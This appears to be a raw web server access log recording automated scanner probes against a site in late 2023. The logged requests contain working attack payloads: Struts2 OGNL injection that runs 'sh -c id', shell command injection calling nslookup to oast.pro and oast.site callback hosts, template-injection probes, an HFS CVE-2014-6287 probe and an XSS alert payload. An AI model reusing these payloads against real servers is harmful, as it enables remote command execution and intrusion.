2023/11/1410:16:17107.172.83.34response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testMozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/1412:24:13107.172.83.34id=F7IZsu%25{128*128}Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/11/1420:43:07107.172.83.34mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"}Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/11/1423:24:26107.172.83.34url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0p36pr85ze9tk1.oast.pro|)}&mgrDn=a&pwd=aMozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36
2023/11/149:18:17107.172.83.34search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36
2023/11/149:47:32107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36
2023/11/149:47:39107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36
2023/11/149:47:54107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36
2023/11/149:48:00107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F
2023/11/149:48:15107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36
2023/11/149:48:22107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36
2023/11/1410:16:17107.172.83.34response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testMozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/11/1420:43:08107.172.83.34mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"}Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36
2023/11/1423:24:26107.172.83.34url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0zuzshxywwbnoh.oast.pro|)}&mgrDn=a&pwd=aMozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36
2023/11/149:47:30107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36
2023/11/149:47:38107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36
2023/11/149:47:47107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36
2023/11/149:47:54107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36
2023/11/149:48:08107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/149:48:12107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36
2023/11/1416:28:59107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36
2023/11/1416:33:46107.172.83.34_tn={{trimprefix(base64_decode(httoken),Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36
2023/11/1412:24:13107.172.83.34id=F7IZsu%25{128*128}Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/11/1416:28:52107.172.83.34uri={{228*|98|}}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F
2023/11/1416:29:00107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36
2023/11/1416:33:46107.172.83.34_tn={{trimprefix(base64_decode(httoken),Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36
2023/11/149:18:18107.172.83.34search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36
2023/11/1416:28:52107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36
2023/11/1410:16:18107.172.83.34response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testMozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36
2023/11/1412:24:16107.172.83.34id=F7IZsu%25{128*128}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36
2023/11/1420:43:09107.172.83.34mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"}Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36
2023/11/1423:24:29107.172.83.34url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0prpmij6g4yssc.oast.pro|)}&mgrDn=a&pwd=aMozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36
2023/11/1416:28:56107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36
2023/11/1416:33:43107.172.83.34_tn={{trimprefix(base64_decode(httoken),Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36
2023/11/152:02:54107.172.83.34types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36
2023/11/151:26:26107.172.83.34clientId={{id}}&timeout=500&wiki=xwikiMozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/151:26:26107.172.83.34clientId={{id}}&timeout=500&wiki=xwikiMozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/152:02:54107.172.83.34types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36
2023/11/1513:32:14141.98.255.144NodeCode=1050050011;nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}&ID=1000000771673841;nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/11/1513:32:17141.98.255.144NodeCode=1050080021;nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}&ID=1000005622917961;nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36
2023/11/1513:32:17141.98.255.144NodeCode=1050060011;nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}&ID=401;nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36
2023/11/151:26:30107.172.83.34clientId={{id}}&timeout=500&wiki=xwikiMozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36
2023/11/152:02:54107.172.83.34types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36
2023/11/151:26:28107.172.83.34clientId={{id}}&timeout=500&wiki=xwikiMozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36
2023/11/152:02:54107.172.83.34types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/151:26:26107.172.83.34clientId={{id}}&timeout=500&wiki=xwikiMozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36
2023/11/152:02:55107.172.83.34types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36
2023/11/151:26:28107.172.83.34clientId={{id}}&timeout=500&wiki=xwikiMozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36
2023/11/152:02:54107.172.83.34types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36
2023/11/176:17:04221.150.78.185search==%00{.cookie|8iyAyJ|value%3dCVE-2014-6287.}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36
2023/11/176:17:04221.150.78.185redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36
2023/11/176:17:04221.150.78.185redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/11/176:17:04221.150.78.185response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testMozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/11/176:17:04221.150.78.185action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36
2023/11/176:17:04221.150.78.185action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/11/176:17:04221.150.78.185redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36
2023/11/176:17:04221.150.78.185id=c2dIKm%25{128*128}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36
2023/11/176:17:04221.150.78.185redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/11/176:17:06221.150.78.185mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36
2023/11/176:17:07221.150.78.185clientId={{id}}&timeout=500&wiki=xwikiMozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/11/285:57:49221.150.72.75redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36
2023/11/285:57:49221.150.72.75redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36
2023/11/285:57:49221.150.72.75response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testMozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36
2023/11/285:57:49221.150.72.75action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36
2023/11/285:57:50221.150.72.75action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36
2023/11/285:57:51221.150.72.75redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36
2023/11/285:57:51221.150.72.75search==%00{.cookie|0I9sin|value%3dCVE-2014-6287.}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F
2023/11/285:57:51221.150.72.75redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F
2023/11/285:58:11221.150.72.75id=h0zvon%25{128*128}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36
2023/12/37:43:5327.151.28.177search==%00{.cookie|kz2ikd|value%3dCVE-2014-6287.}Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
